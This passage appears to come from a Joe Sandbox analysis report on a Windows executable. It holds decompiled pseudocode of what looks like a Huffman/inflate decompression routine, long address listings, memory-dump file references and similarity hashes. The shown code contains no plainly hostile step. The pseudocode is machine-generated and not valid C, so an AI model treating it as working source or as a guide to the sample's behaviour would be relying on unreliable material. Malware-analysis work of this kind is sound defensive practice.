													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x409348 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x409348 + __eax * 2) & 0x0000ffff =  *(0x409348 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x409348 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E004068FF( &(__esi[3]), __edi, 0x101, 0x407388, 0x4073c8, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E004068FF(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x407408, 0x407444, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E00406897( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}

0x00406128
0x00406128
0x00406128
0x00406128
0x00406128
0x0040612c
0x00000000
0x00000000
0x00406132
0x00406132
0x00406135
0x00406138
0x0040613d
0x0040613f
0x00406142
0x00406145
0x00406148
0x00406148
0x0040614b
0x00000000
0x00000000
0x0040614d
0x0040614d
0x00406150
0x00406155
0x00406157
0x0040615a
0x00406160
0x00405ebf
0x00405ebf
0x00405ec2
0x00405ec8
0x00405ece
0x00405ed7
0x00405edd
0x00405ee0
0x00405ee7
0x00405eec
0x00405ef2
0x00405efd
0x00405efd
0x00406166
0x00406166
0x00406170
0x00000000
0x00000000
0x00406176
0x00406176
0x0040617a
0x0040617d
0x0040617d
0x00406181
0x00406187
0x00406187
0x0040618a
0x0040618d
0x00406193
0x00000000
0x00000000
0x00406195
0x004061b7
0x004061b7
0x004061ba
0x00000000
0x00000000
0x00406197
0x0040619b
0x00000000
0x00000000
0x004061a1
0x004061a1
0x004061a4
0x004061a7
0x004061ac
0x004061ae
0x004061b1
0x004061b4
0x004061b4
0x004061bc
0x004061bc
0x004061c2
0x004061c5
0x004061c8
0x004061c8
0x004061cf
0x004061d3
0x004061d7
0x004061da
0x004061dd
0x004061e3
0x004061e8
0x00000000
0x00000000
0x004061ea
0x004061fe
0x004061fe
0x00406202
0x00000000
0x00000000
0x004061ec
0x004061ef
0x004061ef
0x004061f6
0x004061fb
0x004061fb
0x004061fb
0x00406204
0x00406204
0x00406207
0x00406215
0x0040621b
0x00406220
0x00406226
0x0040622c
0x00406232
0x00406239
0x0040624d
0x0040624d
0x0040681c
0x0040681c
0x0040681c
0x00406821
0x00000000
0x00000000
0x00405e59
0x00405e59
0x00000000
0x00406454
0x00406454
0x00406458
0x0040645b
0x0040645e
0x00406461
0x00000000
0x00000000
0x00406467
0x00406467
0x0040648c
0x0040648c
0x0040648c
0x0040648e
0x00000000
0x00000000
0x0040646c
0x0040646c
0x00406470
0x00000000
0x00000000
0x00406476
0x00406476
0x00406479
0x0040647c
0x0040647f
0x00406481
0x00406483
0x00406486
0x00406489
0x00406489
0x00406489
0x00406490
0x00406490
0x00406498
0x0040649b
0x0040649e
0x004064a1
0x004064a5
0x004064a8
0x004064aa
0x004064ad
0x004064af
0x004064c3
0x004064c3
0x004064c6
0x004064e0
0x004064e0
0x004064e3
0x00000000
0x00000000
0x004064e9
0x004064e9
0x004064ec
0x00000000
0x00000000
0x004064f2
0x004064f2
0x00000000
0x004064f2
0x004064c8
0x004064cb
0x004064d2
0x004064d5
0x00000000
0x004064d5
0x004064b1
0x004064b5
0x004064b8
0x00000000
0x00000000
0x004064fd
0x004064fd
0x00406522
0x00406522
0x00406522
0x00406524
0x00000000
0x00000000
0x00406502
0x00406502
0x00406506
0x00000000
0x00000000
0x0040650c
0x0040650c
0x0040650f
0x00406512
0x00406515
0x00406517
0x00406519
0x0040651c
0x0040651f
0x0040651f
0x0040651f
0x00406526
0x0040652e
0x00406531
0x00406534
0x00406536
0x00406539
0x00406539
0x0040653b
0x0040653f
0x00406542
0x00406545
0x00406548
0x00000000
0x00000000
0x0040654e
0x0040654e
0x00406573
0x00406573
0x00406573
0x00406575
0x00000000
0x00000000
0x00406553
0x00406553
0x00406557
0x00000000
0x00000000
0x0040655d
0x0040655d
0x00406560
0x00406563
0x00406566
0x00406568
0x0040656a
0x0040656d
0x00406570
0x00406570
0x00406570
0x00406577
0x00406577
0x0040657f
0x00406582
0x00406585
0x00406588
0x0040658c
0x0040658f
0x00406591
0x00406594
0x00406597
0x004065b1
0x004065b1
0x004065b4
0x00000000
0x00000000
0x004065ba
0x004065ba
0x004065bd
0x004065c4
0x00000000
0x004065c4
0x00406599
0x0040659c
0x004065a3
0x004065a6
0x00000000
0x00000000
0x004065cc
0x004065cc
0x004065f1
0x004065f1
0x004065f1
0x004065f3
0x00000000
0x00000000
0x004065d1
0x004065d1
0x004065d5
0x00000000
0x00000000
0x004065db
0x004065db
0x004065de
0x004065e1
0x004065e4
0x004065e6
0x004065e8
0x004065eb
0x004065ee
0x004065ee
0x004065ee
0x004065f5
0x004065fd
0x00406600
0x00406603
0x00406605
0x00406608
0x00406608
0x0040660a
0x00000000
0x00000000
0x00406610
0x00406610
0x00406613
0x00406618
0x0040661a
0x00406620
0x00406622
0x00406637
0x00406639
0x00406639
0x00406624
0x0040662a
0x0040662c
0x0040662e
0x0040662e
0x0040663b
0x0040663f
0x00406642
0x00406648
0x00406648
0x0040664b
0x0040664b
0x0040664b
0x0040664d
0x00000000
0x00000000
0x00406653
0x00406653
0x00406659
0x0040665b
0x00406680
0x00406683
0x00406689
0x0040668e
0x00406694
0x0040669a
0x0040669c
0x0040669f
0x004066a8
0x004066ae
0x004066ae
0x004066a1
0x004066a3
0x004066a5
0x004066a5
0x004066b0
0x004066b6
0x004066b8
0x004066bb
0x004066bd
0x004066c3
0x004066c5
0x004066c7
0x004066c9
0x004066cb
0x004066ce
0x004066d7
0x004066da
0x004066da
0x004066d0
0x004066d0
0x004066d3
0x004066d3
0x004066ce
0x004066c5
0x004066dc
0x004066de
0x00000000
0x00000000
0x00000000
0x00000000
0x004066de
0x0040665d
0x0040665d
0x00406663
0x00406669
0x0040666b
0x00000000
0x00000000
0x0040666d
0x0040666d
0x0040666f
0x00406671
0x0040667a
0x0040667a
0x00406673
0x00406673
0x00406676
0x00406676
0x0040667c
0x0040667e
0x00000000
0x00000000
0x004066e4
0x004066e4
0x004066e9
0x004066eb
0x004066ec
0x004066ed
0x004066ee
0x004066f4
0x004066f7
0x004066fa
0x004066fd
0x004066ff
0x00406705
0x00406705
0x00406708
0x00406708
0x00406708
0x00406708
0x00406711
0x00000000
0x00000000
0x00406716
0x00406716
0x00406719
0x0040671c
0x0040671e
0x004067b5
0x004067b5
0x004067b8
0x004067ba
0x004067bb
0x004067bc
0x004067bf
0x00000000
0x004067bf
0x00406724
0x00406724
0x0040672a
0x0040672c
0x00406751
0x00406754
0x0040675a
0x0040675f
0x00406765
0x0040676b
0x0040676d
0x00406770
0x00406779
0x0040677f
0x0040677f
0x00406772
0x00406774
0x00406776
0x00406776
0x00406781
0x00406787
0x00406789
0x0040678c
0x0040678e
0x00406794
0x00406796
0x00406798
0x0040679a
0x0040679c
0x0040679f
0x004067a8
0x004067ab
0x004067ab
0x004067a1
0x004067a1
0x004067a4
0x004067a4
0x0040679f
0x00406796
0x004067ad
0x004067af
0x00000000
0x00000000
0x00000000
0x00000000
0x004067af
0x0040672e
0x0040672e
0x00406734
0x0040673a
0x0040673c
0x00000000
0x00000000
0x0040673e
0x0040673e
0x00406740
0x00406742
0x00406749
0x00406749
0x0040674b
0x00406744
0x00406744
0x00406746
0x00406746
0x0040674d
0x0040674f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004067c7
0x004067c7
0x004067ca
0x004067cc
0x004067cf
0x004067d2
0x004067d2
0x004067d2
0x004067d2
0x00000000
0x00000000
0x00000000
0x00405e80
0x00405e64
0x00000000
0x00405e6a
0x00405e6d
0x00405e77
0x00405e7a
0x00405e7d
0x00000000
0x00405e7d
0x00405e64
0x00405e88
0x00405e8b
0x00405e8f
0x00405e99
0x00405ea3
0x00405ea6
0x00405eac
0x00405fe0
0x00405fe2
0x00405fe8
0x00405feb
0x00405fee
0x00000000
0x00405fee
0x00405eb2
0x00405eb2
0x00405eb3
0x00405f0b
0x00405f0b
0x00405f12
0x00405fb8
0x00405fb8
0x00405fbd
0x00405fc0
0x00405fc5
0x00405fc8
0x00405fcd
0x00405fd0
0x00405fd5
0x00405fd8
0x00405fd8
0x00000000
0x00405f18
0x00405f18
0x00405f18
0x00405f18
0x00405f1c
0x00405f1c
0x00405f3e
0x00405f41
0x00405f43
0x00405f46
0x00405f4b
0x00405f21
0x00405f21
0x00405f26
0x00405f28
0x00405f2a
0x00405f2f
0x00405f35
0x00405f3a
0x00405f3c
0x00405f3c
0x00405f31
0x00405f31
0x00405f31
0x00405f2f
0x00000000
0x00405f4d
0x00405f7a
0x00405f7f
0x00405f81
0x00405f82
0x00405f84
0x00405f85
0x00405f85
0x00405f85
0x00405fad
0x00405fb2
0x00405fb2
0x00000000
0x00405fb2
0x00405f4b
0x00405f12
0x00405eb5
0x00405eb5
0x00405eb6
0x00405f00
0x00000000
0x00405f00
0x00405eb8
0x00405eb9
0x00000000
0x00000000
0x00000000
0x00000000
0x00406015
0x00406015
0x00406015
0x00406018
0x00000000
0x00000000
0x00405ff5
0x00405ff5
0x00405ff9
0x00000000
0x00000000
0x00405fff
0x00405fff
0x00406002
0x00406005
0x0040600a
0x0040600c
0x0040600f
0x00406012
0x00406012
0x00406012
0x0040601a
0x0040601a
0x0040601d
0x0040601f
0x00406024
0x00406027
0x00406029
0x0040602c
0x00000000
0x00000000
0x00406032
0x00406032
0x00406034
0x00000000
0x00000000
0x0040603a
0x0040603a
0x0040603e
0x00000000
0x00000000
0x00406044
0x00406044
0x00406047
0x00406049
0x004060e7
0x004060e7
0x004060ea
0x004060ec
0x004060ec
0x004060ef
0x004060f2
0x004060f4
0x004060f6
0x004060f8
0x004060f8
0x00406101
0x00406106
0x00406109
0x0040610c
0x0040610f
0x00406112
0x00406112
0x00406112
0x00406115
0x0040611b
0x0040611b
0x00406121
0x00406121
0x00406121
0x00000000
0x00406115
0x0040604f
0x0040604f
0x00406055
0x00406058
0x0040605a
0x00406085
0x00406088
0x0040608e
0x00406093
0x00406099
0x0040609f
0x004060a1
0x004060a4
0x004060ad
0x004060b3
0x004060b3
0x004060a6
0x004060a8
0x004060aa
0x004060aa
0x004060b5
0x004060bb
0x004060be
0x004060c0
0x004060c2
0x004060c8
0x004060ca
0x004060cc
0x004060cf
0x004060d8
0x004060d8
0x004060da
0x004060d1
0x004060d1
0x004060d4
0x004060d4
0x004060dc
0x004060dc
0x004060ca
0x004060df
0x004060e1
0x00000000
0x00000000
0x00000000
0x00000000
0x004060e1
0x0040605c
0x0040605c
0x00406062
0x00406068
0x0040606a
0x00000000
0x00000000
0x0040606c
0x0040606c
0x0040606e
0x00406070
0x00406073
0x0040607a
0x0040607a
0x0040607c
0x00406075
0x00406075
0x00406077
0x00406077
0x0040607e
0x00406080
0x00406083
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406187
0x0040618a
0x0040618d
0x00406193
0x00000000
0x00000000
0x00000000
0x00000000
0x0040636a
0x0040636a
0x0040636a
0x0040636d
0x00406370
0x00406372
0x00406375
0x0040637b
0x00406382
0x00406384
0x00000000
0x00000000
0x00406258
0x00406258
0x00406280
0x00406280
0x00406280
0x00406282
0x00000000
0x00000000
0x00406260
0x00406260
0x00406264
0x00000000
0x00000000
0x0040626a
0x0040626a
0x0040626d
0x00406270
0x00406273
0x00406275
0x00406277
0x0040627a
0x0040627d
0x0040627d
0x0040627d
0x00406284
0x00406284
0x0040628c
0x0040628f
0x00406295
0x00406298
0x0040629c
0x004062a0
0x004062a3
0x004062a6
0x004062be
0x004062be
0x004062c1
0x004062cf
0x004062d2
0x004062c3
0x004062c3
0x004062c5
0x004062cc
0x004062cc
0x004062fb
0x004062fb
0x004062fb
0x004062fe
0x00406300
0x00000000
0x00000000
0x004062db
0x004062db
0x004062df
0x00000000
0x00000000
0x004062e5
0x004062e5
0x004062e8
0x004062eb
0x004062ee
0x004062f0
0x004062f2
0x004062f5
0x004062f8
0x004062f8
0x004062f8
0x00406302
0x00406302
0x00406304
0x00406306
0x00406311
0x00406314
0x00406317
0x00406319
0x0040631b
0x0040631d
0x00406320
0x00406323
0x00406328
0x0040632b
0x0040632e
0x00406331
0x00406338
0x0040633b
0x0040633d
0x00000000
0x00000000
0x00406343
0x00406343
0x00406347
0x00406358
0x00406358
0x00406358
0x0040635a
0x0040635a
0x0040635e
0x0040635e
0x0040635e
0x00406360
0x00406361
0x00406364
0x00406364
0x00406364
0x00406367
0x00000000
0x00406367
0x00406349
0x00406349
0x0040634c
0x00000000
0x00000000
0x00406352
0x00406352
0x00000000
0x00406352
0x004062a8
0x004062a8
0x004062aa
0x004062ac
0x004062af
0x004062b2
0x004062b6
0x004062b6
0x0040638a
0x0040638a
0x0040638d
0x00406394
0x00406398
0x0040639a
0x0040639d
0x004063a0
0x004063a5
0x004063a8
0x004063aa
0x004063ab
0x004063ae
0x004063b9
0x004063bc
0x004063d3
0x004063d8
0x004063df
0x004063e4
0x004063e8
0x004063ea
0x004063ea
0x004063ea
0x004063ed
0x004063ef
0x00000000
0x004063f5
0x004063f5
0x004063f9
0x00406404
0x00406417
0x0040641c
0x00406421
0x00406423
0x00000000
0x00000000
0x00406429
0x00406429
0x0040642c
0x0040642e
0x0040643c
0x0040643c
0x0040643f
0x0040643f
0x00406442
0x00406445
0x00406448
0x0040644b
0x0040644e
0x00406451
0x00000000
0x00406451
0x00406430
0x00406430
0x00406436
0x00000000
0x00000000
0x00000000
0x00406436
0x00000000
0x00000000
0x00000000
0x004067d5
0x004067d5
0x004067db
0x004067e1
0x004067e6
0x004067ec
0x004067f2
0x004067f4
0x004067f7
0x00406800
0x00406806
0x00406806
0x004067f9
0x004067fb
0x004067fd
0x004067fd
0x00406808
0x0040680a
0x0040680d
0x00406848
0x00406848
0x00000000
0x0040680f
0x0040680f
0x0040680f
0x00406815
0x00406818
0x0040681a
0x0040684f
0x00406851
0x00000000
0x00406851
0x00000000
0x0040681a
0x00000000
0x00405e59
0x00406827
0x00000000
0x00406827
0x0040623b
0x0040623d
0x00000000
0x00000000
0x0040623f
0x0040623f
0x00406242
0x00000000
0x00406242
0x00406187
0x00406148
0x0040682c
0x0040682f
0x00406831
0x0040683a
0x00406840
0x00000000

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2605cf98d0f5e4d904242d25cd3a4b56aad5cd8bbaf3b06cd26a7c18d89d64d
Instruction ID: 671146196c1174ec618cbc22bbed2adbdbe1d7b4d249fb8fe9215707769dedfe
Opcode Fuzzy Hash: c2605cf98d0f5e4d904242d25cd3a4b56aad5cd8bbaf3b06cd26a7c18d89d64d
Instruction Fuzzy Hash: 3FE16971901B09DFDB24CF58C880BAABBF5EB44305F15852EE897A72D1D378AA51CF44

Uniqueness

Uniqueness Score: -1.00%

Function 004068FF Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004068FF(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42cdf8 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42cdf8;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
